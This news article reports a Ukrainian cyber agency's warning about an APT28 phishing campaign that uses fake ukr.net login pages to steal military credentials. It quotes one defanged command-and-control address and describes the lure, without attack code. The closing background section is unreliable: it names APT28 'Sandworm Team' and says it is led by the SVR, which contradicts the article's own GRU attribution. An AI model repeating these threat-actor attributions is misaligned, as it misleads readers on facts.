Russian APT28 phishing Ukraine's military to steal login info

Ukraine’s National Cyber Security Coordination Center (NCSCC) is warning its military members of a new phishing campaign led by the Russian-backed cybercriminal group APT28.

“Amidst the lack of success on the battlefield, Russia is stepping up its cyber-espionage efforts and continuing to try to gain access to Ukraine's military situational awareness and command and control systems by stealing military personnel's credentials,” the NCSCC said in an official statement on the attacks.

The NCSCC put the warning out on various social media platforms over the weekend, which was picked up and further distributed by the all volunteer IT Army of Ukraine on Monday.

APT28 is specifically targeting military personnel and units of the Ukrainian Defense Forces using phishing emails in an attempt to gain access to military email accounts, the NCSCC said.

“APT28 targets Ukrainian military with phishing!, the IT Army Telegram post said.

“They create sites that look almost identical to ukr[.]net but have slight differences in the URL to trap you into entering your data!,” it said.

IT Army Ukraine APT28 espionage campaign

The government defense agency said it first became aware of the campaign on January 19th, after discovering several emails containing fake HTML pages on the “ukr[.]net mail service.”

In one instance, the hackers crafted an HTML page “imitating military operational information regarding the Russian invasion.” which sent the user to a fake login page.

“When the page is opened, a field for entering ukr[.]net credentials is displayed to allegedly "confirm access," from where the credentials will be sent to a server controlled by the group, the agency posted on X.

In another instance, the hackers try and trick the user by sending an email that the account was compromised, and providing a link to reset the account password.

“When clicking on the "Change password" button on the HTML page, a Browser in browser attack is launched and a special iframe with a fake page for entering ukr[.]net credentials is embedded, the NCSCC said.

In both cases, the credentials are exfiltrated to a command and control server, where the group attempts to escalate privileges and move around the system.

The NCSCC reported that “the actor-controlled server (hxxp://202.55.80[.]225:35770) is an Ubiquiti Edge router."

APT28 is known for using "pre-compromised Ubiquiti Edge routers to exfiltrate data in previous phishing campaigns," the agency said.

Who is APT28?

APT28 – also referred to as Fancy Bear or Sandworm Team – is not to be confused with the Russian Advanced Persistent Threat group APT29, first originating in 2008.

APT28 was formed in 2004 and has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165, according to the Mitre Att&ck framework.

In 2016, the group was thought to have carried out attacks on the US Democratic National Committee and Congressional Campaign Committee, including the Hillary Clinton campaign, in an attempt to interfere with the US presidential election, Mitre reported.

Five members of the GRU 26165 were charged by the feds in 2018 for infiltrating the US and World Anti-Doping Agencies, among other high value targets, the report said.

APT29 – aka Cozy Bear or Nobelium – is the gang responsible for the recently discovered attacks on Microsoft, Hewlett Packard Enterprise, and its infamous 2020 SolarWinds breach of the US government.

Still backed by the Kremlin, APT28 is said to be led by Russia’s Foreign Intelligence Service (SVR).